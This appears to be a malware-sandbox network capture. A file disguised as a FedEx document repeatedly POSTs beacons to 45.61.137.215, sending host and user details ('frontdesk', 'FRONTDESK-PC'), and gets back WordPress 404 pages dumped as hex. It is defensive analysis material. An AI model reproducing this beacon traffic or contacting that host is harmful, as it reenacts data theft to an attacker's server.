                Data Ascii: <!DOCTYPE html><html lang="en-US"><head><meta charset="UTF-8"><meta name="viewport" content="width=device-width, initial-scale=1"><link rel="profile" href="https://gmpg.org/xfn/11"><title>Page not found &#8211; separated paper</title><meta name='robots' content='max-image-preview:large' /><link rel='dns-prefetch' href='//fonts.googleapis.com' /><link rel="alternate" type="application/rss+xml" title="separated paper &raquo; Feed" href="http://45.61.137.215/index.php/feed/" /><link rel="alternate" type="application/rss+xml" title="separated paper &raquo; Comments Feed" href="http://45.61.137.215/index.php/comments/feed/" /><script type="text/javascript">/* <![CDATA[ */window._wpemojiSettings = {"baseUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/72x72\/","ext":".png","svgUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/svg\/","svgExt":".svg","source":{"concate
                May 22, 2024 22:03:22.166960955 CEST1236INData Raw: 6d 6f 6a 69 22 3a 22 68 74 74 70 3a 5c 2f 5c 2f 34 35 2e 36 31 2e 31 33 37 2e 32 31 35 5c 2f 77 70 2d 69 6e 63 6c 75 64 65 73 5c 2f 6a 73 5c 2f 77 70 2d 65 6d 6f 6a 69 2d 72 65 6c 65 61 73 65 2e 6d 69 6e 2e 6a 73 3f 76 65 72 3d 36 2e 35 2e 33 22
                Data Ascii: moji":"http:\/\/45.61.137.215\/wp-includes\/js\/wp-emoji-release.min.js?ver=6.5.3"}};/*! This file is auto-generated */!function(i,n){var o,s,e;function c(e){try{var t={supportTests:e,timestamp:(new Date).valueOf()};sessionStorage.setItem(o,
                May 22, 2024 22:03:22.167726040 CEST1236INData Raw: 65 6e 43 61 6e 76 61 73 28 33 30 30 2c 31 35 30 29 3a 69 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 22 63 61 6e 76 61 73 22 29 2c 61 3d 72 2e 67 65 74 43 6f 6e 74 65 78 74 28 22 32 64 22 2c 7b 77 69 6c 6c 52 65 61 64 46 72 65 71 75 65 6e 74 6c
                Data Ascii: enCanvas(300,150):i.createElement("canvas"),a=r.getContext("2d",{willReadFrequently:!0}),o=(a.textBaseline="top",a.font="600 32px Arial",{});return e.forEach(function(e){o[e]=t(a,e,n)}),o}function t(e){var t=i.createElement("script");t.src=e,t
                May 22, 2024 22:03:22.167738914 CEST1236INData Raw: 75 70 70 6f 72 74 73 5b 74 5d 3d 65 5b 74 5d 2c 6e 2e 73 75 70 70 6f 72 74 73 2e 65 76 65 72 79 74 68 69 6e 67 3d 6e 2e 73 75 70 70 6f 72 74 73 2e 65 76 65 72 79 74 68 69 6e 67 26 26 6e 2e 73 75 70 70 6f 72 74 73 5b 74 5d 2c 22 66 6c 61 67 22 21
                Data Ascii: upports[t]=e[t],n.supports.everything=n.supports.everything&&n.supports[t],"flag"!==t&&(n.supports.everythingExceptFlag=n.supports.everythingExceptFlag&&n.supports[t]);n.supports.everythingExceptFlag=n.supports.everythingExceptFlag&&!n.support
                May 22, 2024 22:03:22.169919014 CEST1236INData Raw: 72 3a 23 33 32 33 37 33 63 3b 62 6f 72 64 65 72 2d 72 61 64 69 75 73 3a 39 39 39 39 70 78 3b 62 6f 78 2d 73 68 61 64 6f 77 3a 6e 6f 6e 65 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 3b 70 61 64 64 69 6e 67 3a 63 61 6c 63 28 2e
                Data Ascii: r:#32373c;border-radius:9999px;box-shadow:none;text-decoration:none;padding:calc(.667em + 2px) calc(1.333em + 2px);font-size:1.125em}.wp-block-file__button{background:#32373c;color:#fff;text-decoration:none}</style><style id='global-styles-i
                May 22, 2024 22:03:22.169934988 CEST1236INData Raw: 6e 67 65 2d 74 6f 2d 76 69 76 69 64 2d 72 65 64 3a 20 6c 69 6e 65 61 72 2d 67 72 61 64 69 65 6e 74 28 31 33 35 64 65 67 2c 72 67 62 61 28 32 35 35 2c 31 30 35 2c 30 2c 31 29 20 30 25 2c 72 67 62 28 32 30 37 2c 34 36 2c 34 36 29 20 31 30 30 25 29
                Data Ascii: nge-to-vivid-red: linear-gradient(135deg,rgba(255,105,0,1) 0%,rgb(207,46,46) 100%);--wp--preset--gradient--very-light-gray-to-cyan-bluish-gray: linear-gradient(135deg,rgb(238,238,238) 0%,rgb(169,184,195) 100%);--wp--preset--gradient--cool-to-w
                May 22, 2024 22:03:22.172151089 CEST1236INData Raw: 2d 70 72 65 73 65 74 2d 2d 73 70 61 63 69 6e 67 2d 2d 32 30 3a 20 30 2e 34 34 72 65 6d 3b 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 73 70 61 63 69 6e 67 2d 2d 33 30 3a 20 30 2e 36 37 72 65 6d 3b 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 73 70 61
                Data Ascii: -preset--spacing--20: 0.44rem;--wp--preset--spacing--30: 0.67rem;--wp--preset--spacing--40: 1rem;--wp--preset--spacing--50: 1.5rem;--wp--preset--spacing--60: 2.25rem;--wp--preset--spacing--70: 3.38rem;--wp--preset--spacing--80: 5.06rem;--wp--p
                May 22, 2024 22:03:22.172164917 CEST1236INData Raw: 77 68 69 74 65 2d 63 6f 6c 6f 72 7b 63 6f 6c 6f 72 3a 20 76 61 72 28 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 63 6f 6c 6f 72 2d 2d 77 68 69 74 65 29 20 21 69 6d 70 6f 72 74 61 6e 74 3b 7d 2e 68 61 73 2d 70 61 6c 65 2d 70 69 6e 6b 2d 63 6f 6c 6f
                Data Ascii: white-color{color: var(--wp--preset--color--white) !important;}.has-pale-pink-color{color: var(--wp--preset--color--pale-pink) !important;}.has-vivid-red-color{color: var(--wp--preset--color--vivid-red) !important;}.has-luminous-vivid-orange-c
                May 22, 2024 22:03:22.175484896 CEST1236INData Raw: 74 3b 7d 2e 68 61 73 2d 76 69 76 69 64 2d 72 65 64 2d 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 76 61 72 28 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 63 6f 6c 6f 72 2d 2d 76 69 76 69
                Data Ascii: t;}.has-vivid-red-background-color{background-color: var(--wp--preset--color--vivid-red) !important;}.has-luminous-vivid-orange-background-color{background-color: var(--wp--preset--color--luminous-vivid-orange) !important;}.has-luminous-vivid-
                May 22, 2024 22:03:22.175529003 CEST1236INData Raw: 69 6d 70 6f 72 74 61 6e 74 3b 7d 2e 68 61 73 2d 76 69 76 69 64 2d 72 65 64 2d 62 6f 72 64 65 72 2d 63 6f 6c 6f 72 7b 62 6f 72 64 65 72 2d 63 6f 6c 6f 72 3a 20 76 61 72 28 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 63 6f 6c 6f 72 2d 2d 76 69 76 69
                Data Ascii: important;}.has-vivid-red-border-color{border-color: var(--wp--preset--color--vivid-red) !important;}.has-luminous-vivid-orange-border-color{border-color: var(--wp--preset--color--luminous-vivid-orange) !important;}.has-luminous-vivid-amber-bo


                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                30192.168.2.74974245.61.137.215806192C:\Users\user\Desktop\FedEx_776282383902.exe
                TimestampBytes transferredDirectionData
                May 22, 2024 22:03:22.325206041 CEST244OUTPOST /index.php/t?id=090 HTTP/1.0
                User-Agent: Mozilla/4.08 (Charon; Inferno)
                Host: 45.61.137.215
                Accept: */*
                Content-Type: application/octet-stream
                Content-Encoding: binary
                Content-Key: A316C5D8
                Content-Length: 165
                Connection: close
                May 22, 2024 22:03:22.381710052 CEST165OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 12 00 00 00 66 00 72 00 6f 00 6e 00 74 00 64 00 65 00 73 00 6b 00 01 00 0c 00 00 00 38 00 34 00 31 00 36 00 31 00 38 00 01 00 18 00 00 00 46 00 52 00 4f 00 4e 00 54 00 44 00 45 00 53 00 4b
                Data Ascii: (ckav.rufrontdesk841618FRONTDESK-PC0FDD42EE188E931437F4FBE2C
                May 22, 2024 22:03:25.641832113 CEST1236INHTTP/1.0 404 Not Found
                Date: Wed, 22 May 2024 20:03:22 GMT
                Server: Apache/2.4.52 (Ubuntu)
                Expires: Wed, 11 Jan 1984 05:00:00 GMT
                Cache-Control: no-cache, must-revalidate, max-age=0
                Link: <http://45.61.137.215/index.php/wp-json/>; rel="https://api.w.org/"
                Connection: close
                Content-Type: text/html; charset=UTF-8
                Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 0d 0a 09 3c 68 65 61 64 3e 0d 0a 09 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0d 0a 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0d 0a 09 09 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 6f 66 69 6c 65 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 67 6d 70 67 2e 6f 72 67 2f 78 66 6e 2f 31 31 22 3e 0d 0a 09 09 0d 0a 09 09 3c 74 69 74 6c 65 3e 50 61 67 65 20 6e 6f 74 20 66 6f 75 6e 64 20 26 23 38 32 31 31 3b 20 73 65 70 61 72 61 74 65 64 20 70 61 70 65 72 3c 2f 74 69 74 6c 65 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 27 72 6f 62 6f 74 73 27 20 63 6f 6e 74 65 6e 74 3d 27 6d 61 78 2d 69 6d 61 67 65 2d 70 72 65 76 69 65 77 3a 6c 61 72 67 65 27 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 27 64 6e 73 2d 70 72 65 66 65 74 [TRUNCATED]
                Data Ascii: <!DOCTYPE html><html lang="en-US"><head><meta charset="UTF-8"><meta name="viewport" content="width=device-width, initial-scale=1"><link rel="profile" href="https://gmpg.org/xfn/11"><title>Page not found &#8211; separated paper</title><meta name='robots' content='max-image-preview:large' /><link rel='dns-prefetch' href='//fonts.googleapis.com' /><link rel="alternate" type="application/rss+xml" title="separated paper &raquo; Feed" href="http://45.61.137.215/index.php/feed/" /><link rel="alternate" type="application/rss+xml" title="separated paper &raquo; Comments Feed" href="http://45.61.137.215/index.php/comments/feed/" /><script type="text/javascript">/* <![CDATA[ */window._wpemojiSettings = {"baseUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/72x72\/","ext":".png","svgUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/svg\/","svgExt":".svg","source":{"concate
                May 22, 2024 22:03:25.642281055 CEST1236INData Raw: 6d 6f 6a 69 22 3a 22 68 74 74 70 3a 5c 2f 5c 2f 34 35 2e 36 31 2e 31 33 37 2e 32 31 35 5c 2f 77 70 2d 69 6e 63 6c 75 64 65 73 5c 2f 6a 73 5c 2f 77 70 2d 65 6d 6f 6a 69 2d 72 65 6c 65 61 73 65 2e 6d 69 6e 2e 6a 73 3f 76 65 72 3d 36 2e 35 2e 33 22
                Data Ascii: moji":"http:\/\/45.61.137.215\/wp-includes\/js\/wp-emoji-release.min.js?ver=6.5.3"}};/*! This file is auto-generated */!function(i,n){var o,s,e;function c(e){try{var t={supportTests:e,timestamp:(new Date).valueOf()};sessionStorage.setItem(o,
                May 22, 2024 22:03:25.643412113 CEST1236INData Raw: 65 6e 43 61 6e 76 61 73 28 33 30 30 2c 31 35 30 29 3a 69 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 22 63 61 6e 76 61 73 22 29 2c 61 3d 72 2e 67 65 74 43 6f 6e 74 65 78 74 28 22 32 64 22 2c 7b 77 69 6c 6c 52 65 61 64 46 72 65 71 75 65 6e 74 6c
                Data Ascii: enCanvas(300,150):i.createElement("canvas"),a=r.getContext("2d",{willReadFrequently:!0}),o=(a.textBaseline="top",a.font="600 32px Arial",{});return e.forEach(function(e){o[e]=t(a,e,n)}),o}function t(e){var t=i.createElement("script");t.src=e,t
                May 22, 2024 22:03:25.644623995 CEST1236INData Raw: 75 70 70 6f 72 74 73 5b 74 5d 3d 65 5b 74 5d 2c 6e 2e 73 75 70 70 6f 72 74 73 2e 65 76 65 72 79 74 68 69 6e 67 3d 6e 2e 73 75 70 70 6f 72 74 73 2e 65 76 65 72 79 74 68 69 6e 67 26 26 6e 2e 73 75 70 70 6f 72 74 73 5b 74 5d 2c 22 66 6c 61 67 22 21
                Data Ascii: upports[t]=e[t],n.supports.everything=n.supports.everything&&n.supports[t],"flag"!==t&&(n.supports.everythingExceptFlag=n.supports.everythingExceptFlag&&n.supports[t]);n.supports.everythingExceptFlag=n.supports.everythingExceptFlag&&!n.support
                May 22, 2024 22:03:25.644638062 CEST1236INData Raw: 72 3a 23 33 32 33 37 33 63 3b 62 6f 72 64 65 72 2d 72 61 64 69 75 73 3a 39 39 39 39 70 78 3b 62 6f 78 2d 73 68 61 64 6f 77 3a 6e 6f 6e 65 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 3b 70 61 64 64 69 6e 67 3a 63 61 6c 63 28 2e
                Data Ascii: r:#32373c;border-radius:9999px;box-shadow:none;text-decoration:none;padding:calc(.667em + 2px) calc(1.333em + 2px);font-size:1.125em}.wp-block-file__button{background:#32373c;color:#fff;text-decoration:none}</style><style id='global-styles-i
                May 22, 2024 22:03:25.646816969 CEST1236INData Raw: 6e 67 65 2d 74 6f 2d 76 69 76 69 64 2d 72 65 64 3a 20 6c 69 6e 65 61 72 2d 67 72 61 64 69 65 6e 74 28 31 33 35 64 65 67 2c 72 67 62 61 28 32 35 35 2c 31 30 35 2c 30 2c 31 29 20 30 25 2c 72 67 62 28 32 30 37 2c 34 36 2c 34 36 29 20 31 30 30 25 29
                Data Ascii: nge-to-vivid-red: linear-gradient(135deg,rgba(255,105,0,1) 0%,rgb(207,46,46) 100%);--wp--preset--gradient--very-light-gray-to-cyan-bluish-gray: linear-gradient(135deg,rgb(238,238,238) 0%,rgb(169,184,195) 100%);--wp--preset--gradient--cool-to-w
                May 22, 2024 22:03:25.647996902 CEST1236INData Raw: 2d 70 72 65 73 65 74 2d 2d 73 70 61 63 69 6e 67 2d 2d 32 30 3a 20 30 2e 34 34 72 65 6d 3b 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 73 70 61 63 69 6e 67 2d 2d 33 30 3a 20 30 2e 36 37 72 65 6d 3b 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 73 70 61
                Data Ascii: -preset--spacing--20: 0.44rem;--wp--preset--spacing--30: 0.67rem;--wp--preset--spacing--40: 1rem;--wp--preset--spacing--50: 1.5rem;--wp--preset--spacing--60: 2.25rem;--wp--preset--spacing--70: 3.38rem;--wp--preset--spacing--80: 5.06rem;--wp--p
                May 22, 2024 22:03:25.648010015 CEST108INData Raw: 77 68 69 74 65 2d 63 6f 6c 6f 72 7b 63 6f 6c 6f 72 3a 20 76 61 72 28 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 63 6f 6c 6f 72 2d 2d 77 68 69 74 65 29 20 21 69 6d 70 6f 72 74 61 6e 74 3b 7d 2e 68 61 73 2d 70 61 6c 65 2d 70 69 6e 6b 2d 63 6f 6c 6f
                Data Ascii: white-color{color: var(--wp--preset--color--white) !important;}.has-pale-pink-color{color: var(--wp--preset-
                May 22, 2024 22:03:25.648019075 CEST1236INData Raw: 2d 63 6f 6c 6f 72 2d 2d 70 61 6c 65 2d 70 69 6e 6b 29 20 21 69 6d 70 6f 72 74 61 6e 74 3b 7d 2e 68 61 73 2d 76 69 76 69 64 2d 72 65 64 2d 63 6f 6c 6f 72 7b 63 6f 6c 6f 72 3a 20 76 61 72 28 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 63 6f 6c 6f 72
                Data Ascii: -color--pale-pink) !important;}.has-vivid-red-color{color: var(--wp--preset--color--vivid-red) !important;}.has-luminous-vivid-orange-color{color: var(--wp--preset--color--luminous-vivid-orange) !important;}.has-luminous-vivid-amber-color{colo
                May 22, 2024 22:03:25.650299072 CEST1236INData Raw: 6d 69 6e 6f 75 73 2d 76 69 76 69 64 2d 6f 72 61 6e 67 65 2d 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 76 61 72 28 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 63 6f 6c 6f 72 2d 2d 6c 75
                Data Ascii: minous-vivid-orange-background-color{background-color: var(--wp--preset--color--luminous-vivid-orange) !important;}.has-luminous-vivid-amber-background-color{background-color: var(--wp--preset--color--luminous-vivid-amber) !important;}.has-lig


                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                31192.168.2.74974345.61.137.215806192C:\Users\user\Desktop\FedEx_776282383902.exe
                TimestampBytes transferredDirectionData
                May 22, 2024 22:03:25.799709082 CEST244OUTPOST /index.php/t?id=090 HTTP/1.0
                User-Agent: Mozilla/4.08 (Charon; Inferno)
                Host: 45.61.137.215
                Accept: */*
                Content-Type: application/octet-stream
                Content-Encoding: binary
                Content-Key: A316C5D8
                Content-Length: 165
                Connection: close
                May 22, 2024 22:03:25.848279953 CEST165OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 12 00 00 00 66 00 72 00 6f 00 6e 00 74 00 64 00 65 00 73 00 6b 00 01 00 0c 00 00 00 38 00 34 00 31 00 36 00 31 00 38 00 01 00 18 00 00 00 46 00 52 00 4f 00 4e 00 54 00 44 00 45 00 53 00 4b
                Data Ascii: (ckav.rufrontdesk841618FRONTDESK-PC0FDD42EE188E931437F4FBE2C
                May 22, 2024 22:03:29.346072912 CEST1236INHTTP/1.0 404 Not Found
                Date: Wed, 22 May 2024 20:03:26 GMT
                Server: Apache/2.4.52 (Ubuntu)
                Expires: Wed, 11 Jan 1984 05:00:00 GMT
                Cache-Control: no-cache, must-revalidate, max-age=0
                Link: <http://45.61.137.215/index.php/wp-json/>; rel="https://api.w.org/"
                Connection: close
                Content-Type: text/html; charset=UTF-8
                Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 0d 0a 09 3c 68 65 61 64 3e 0d 0a 09 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0d 0a 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0d 0a 09 09 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 6f 66 69 6c 65 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 67 6d 70 67 2e 6f 72 67 2f 78 66 6e 2f 31 31 22 3e 0d 0a 09 09 0d 0a 09 09 3c 74 69 74 6c 65 3e 50 61 67 65 20 6e 6f 74 20 66 6f 75 6e 64 20 26 23 38 32 31 31 3b 20 73 65 70 61 72 61 74 65 64 20 70 61 70 65 72 3c 2f 74 69 74 6c 65 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 27 72 6f 62 6f 74 73 27 20 63 6f 6e 74 65 6e 74 3d 27 6d 61 78 2d 69 6d 61 67 65 2d 70 72 65 76 69 65 77 3a 6c 61 72 67 65 27 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 27 64 6e 73 2d 70 72 65 66 65 74 [TRUNCATED]
                Data Ascii: <!DOCTYPE html><html lang="en-US"><head><meta charset="UTF-8"><meta name="viewport" content="width=device-width, initial-scale=1"><link rel="profile" href="https://gmpg.org/xfn/11"><title>Page not found &#8211; separated paper</title><meta name='robots' content='max-image-preview:large' /><link rel='dns-prefetch' href='//fonts.googleapis.com' /><link rel="alternate" type="application/rss+xml" title="separated paper &raquo; Feed" href="http://45.61.137.215/index.php/feed/" /><link rel="alternate" type="application/rss+xml" title="separated paper &raquo; Comments Feed" href="http://45.61.137.215/index.php/comments/feed/" /><script type="text/javascript">/* <![CDATA[ */window._wpemojiSettings = {"baseUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/72x72\/","ext":".png","svgUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/svg\/","svgExt":".svg","source":{"concate
                May 22, 2024 22:03:29.346666098 CEST1236INData Raw: 6d 6f 6a 69 22 3a 22 68 74 74 70 3a 5c 2f 5c 2f 34 35 2e 36 31 2e 31 33 37 2e 32 31 35 5c 2f 77 70 2d 69 6e 63 6c 75 64 65 73 5c 2f 6a 73 5c 2f 77 70 2d 65 6d 6f 6a 69 2d 72 65 6c 65 61 73 65 2e 6d 69 6e 2e 6a 73 3f 76 65 72 3d 36 2e 35 2e 33 22
                Data Ascii: moji":"http:\/\/45.61.137.215\/wp-includes\/js\/wp-emoji-release.min.js?ver=6.5.3"}};/*! This file is auto-generated */!function(i,n){var o,s,e;function c(e){try{var t={supportTests:e,timestamp:(new Date).valueOf()};sessionStorage.setItem(o,
                May 22, 2024 22:03:29.347649097 CEST1236INData Raw: 65 6e 43 61 6e 76 61 73 28 33 30 30 2c 31 35 30 29 3a 69 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 22 63 61 6e 76 61 73 22 29 2c 61 3d 72 2e 67 65 74 43 6f 6e 74 65 78 74 28 22 32 64 22 2c 7b 77 69 6c 6c 52 65 61 64 46 72 65 71 75 65 6e 74 6c
                Data Ascii: enCanvas(300,150):i.createElement("canvas"),a=r.getContext("2d",{willReadFrequently:!0}),o=(a.textBaseline="top",a.font="600 32px Arial",{});return e.forEach(function(e){o[e]=t(a,e,n)}),o}function t(e){var t=i.createElement("script");t.src=e,t
                May 22, 2024 22:03:29.348840952 CEST1236INData Raw: 75 70 70 6f 72 74 73 5b 74 5d 3d 65 5b 74 5d 2c 6e 2e 73 75 70 70 6f 72 74 73 2e 65 76 65 72 79 74 68 69 6e 67 3d 6e 2e 73 75 70 70 6f 72 74 73 2e 65 76 65 72 79 74 68 69 6e 67 26 26 6e 2e 73 75 70 70 6f 72 74 73 5b 74 5d 2c 22 66 6c 61 67 22 21
                Data Ascii: upports[t]=e[t],n.supports.everything=n.supports.everything&&n.supports[t],"flag"!==t&&(n.supports.everythingExceptFlag=n.supports.everythingExceptFlag&&n.supports[t]);n.supports.everythingExceptFlag=n.supports.everythingExceptFlag&&!n.support
                May 22, 2024 22:03:29.348855019 CEST896INData Raw: 72 3a 23 33 32 33 37 33 63 3b 62 6f 72 64 65 72 2d 72 61 64 69 75 73 3a 39 39 39 39 70 78 3b 62 6f 78 2d 73 68 61 64 6f 77 3a 6e 6f 6e 65 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 3b 70 61 64 64 69 6e 67 3a 63 61 6c 63 28 2e
                Data Ascii: r:#32373c;border-radius:9999px;box-shadow:none;text-decoration:none;padding:calc(.667em + 2px) calc(1.333em + 2px);font-size:1.125em}.wp-block-file__button{background:#32373c;color:#fff;text-decoration:none}</style><style id='global-styles-i
                May 22, 2024 22:03:29.351475000 CEST1236INData Raw: 2c 32 32 37 2c 31 29 20 30 25 2c 72 67 62 28 31 35 35 2c 38 31 2c 32 32 34 29 20 31 30 30 25 29 3b 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 67 72 61 64 69 65 6e 74 2d 2d 6c 69 67 68 74 2d 67 72 65 65 6e 2d 63 79 61 6e 2d 74 6f 2d 76 69 76 69 64
                Data Ascii: ,227,1) 0%,rgb(155,81,224) 100%);--wp--preset--gradient--light-green-cyan-to-vivid-green-cyan: linear-gradient(135deg,rgb(122,220,180) 0%,rgb(0,208,130) 100%);--wp--preset--gradient--luminous-vivid-amber-to-luminous-vivid-orange: linear-gradie
                May 22, 2024 22:03:29.352358103 CEST1236INData Raw: 64 69 65 6e 74 2d 2d 65 6c 65 63 74 72 69 63 2d 67 72 61 73 73 3a 20 6c 69 6e 65 61 72 2d 67 72 61 64 69 65 6e 74 28 31 33 35 64 65 67 2c 72 67 62 28 32 30 32 2c 32 34 38 2c 31 32 38 29 20 30 25 2c 72 67 62 28 31 31 33 2c 32 30 36 2c 31 32 36 29
                Data Ascii: dient--electric-grass: linear-gradient(135deg,rgb(202,248,128) 0%,rgb(113,206,126) 100%);--wp--preset--gradient--midnight: linear-gradient(135deg,rgb(2,3,129) 0%,rgb(40,116,252) 100%);--wp--preset--font-size--small: 13px;--wp--preset--font-siz
                May 22, 2024 22:03:29.352370977 CEST1236INData Raw: 20 32 65 6d 3b 7d 3a 77 68 65 72 65 28 2e 77 70 2d 62 6c 6f 63 6b 2d 63 6f 6c 75 6d 6e 73 2e 69 73 2d 6c 61 79 6f 75 74 2d 67 72 69 64 29 7b 67 61 70 3a 20 32 65 6d 3b 7d 3a 77 68 65 72 65 28 2e 77 70 2d 62 6c 6f 63 6b 2d 70 6f 73 74 2d 74 65 6d
                Data Ascii: 2em;}:where(.wp-block-columns.is-layout-grid){gap: 2em;}:where(.wp-block-post-template.is-layout-flex){gap: 1.25em;}:where(.wp-block-post-template.is-layout-grid){gap: 1.25em;}.has-black-color{color: var(--wp--preset--color--black) !important
                May 22, 2024 22:03:29.352380991 CEST1236INData Raw: 61 72 28 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 63 6f 6c 6f 72 2d 2d 62 6c 61 63 6b 29 20 21 69 6d 70 6f 72 74 61 6e 74 3b 7d 2e 68 61 73 2d 63 79 61 6e 2d 62 6c 75 69 73 68 2d 67 72 61 79 2d 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 7b
                Data Ascii: ar(--wp--preset--color--black) !important;}.has-cyan-bluish-gray-background-color{background-color: var(--wp--preset--color--cyan-bluish-gray) !important;}.has-white-background-color{background-color: var(--wp--preset--color--white) !important
                May 22, 2024 22:03:29.354609013 CEST896INData Raw: 61 63 6b 2d 62 6f 72 64 65 72 2d 63 6f 6c 6f 72 7b 62 6f 72 64 65 72 2d 63 6f 6c 6f 72 3a 20 76 61 72 28 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 63 6f 6c 6f 72 2d 2d 62 6c 61 63 6b 29 20 21 69 6d 70 6f 72 74 61 6e 74 3b 7d 2e 68 61 73 2d 63 79
                Data Ascii: ack-border-color{border-color: var(--wp--preset--color--black) !important;}.has-cyan-bluish-gray-border-color{border-color: var(--wp--preset--color--cyan-bluish-gray) !important;}.has-white-border-color{border-color: var(--wp--preset--color--w


                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                32192.168.2.74974445.61.137.215806192C:\Users\user\Desktop\FedEx_776282383902.exe
                TimestampBytes transferredDirectionData
                May 22, 2024 22:03:29.494079113 CEST244OUTPOST /index.php/t?id=090 HTTP/1.0
                User-Agent: Mozilla/4.08 (Charon; Inferno)
                Host: 45.61.137.215
                Accept: */*
                Content-Type: application/octet-stream
                Content-Encoding: binary
                Content-Key: A316C5D8
                Content-Length: 165
                Connection: close
                May 22, 2024 22:03:29.545775890 CEST165OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 12 00 00 00 66 00 72 00 6f 00 6e 00 74 00 64 00 65 00 73 00 6b 00 01 00 0c 00 00 00 38 00 34 00 31 00 36 00 31 00 38 00 01 00 18 00 00 00 46 00 52 00 4f 00 4e 00 54 00 44 00 45 00 53 00 4b
                Data Ascii: (ckav.rufrontdesk841618FRONTDESK-PC0FDD42EE188E931437F4FBE2C
                May 22, 2024 22:03:32.748140097 CEST1236INHTTP/1.0 404 Not Found
                Date: Wed, 22 May 2024 20:03:30 GMT
                Server: Apache/2.4.52 (Ubuntu)
                Expires: Wed, 11 Jan 1984 05:00:00 GMT
                Cache-Control: no-cache, must-revalidate, max-age=0
                Link: <http://45.61.137.215/index.php/wp-json/>; rel="https://api.w.org/"
                Connection: close
                Content-Type: text/html; charset=UTF-8
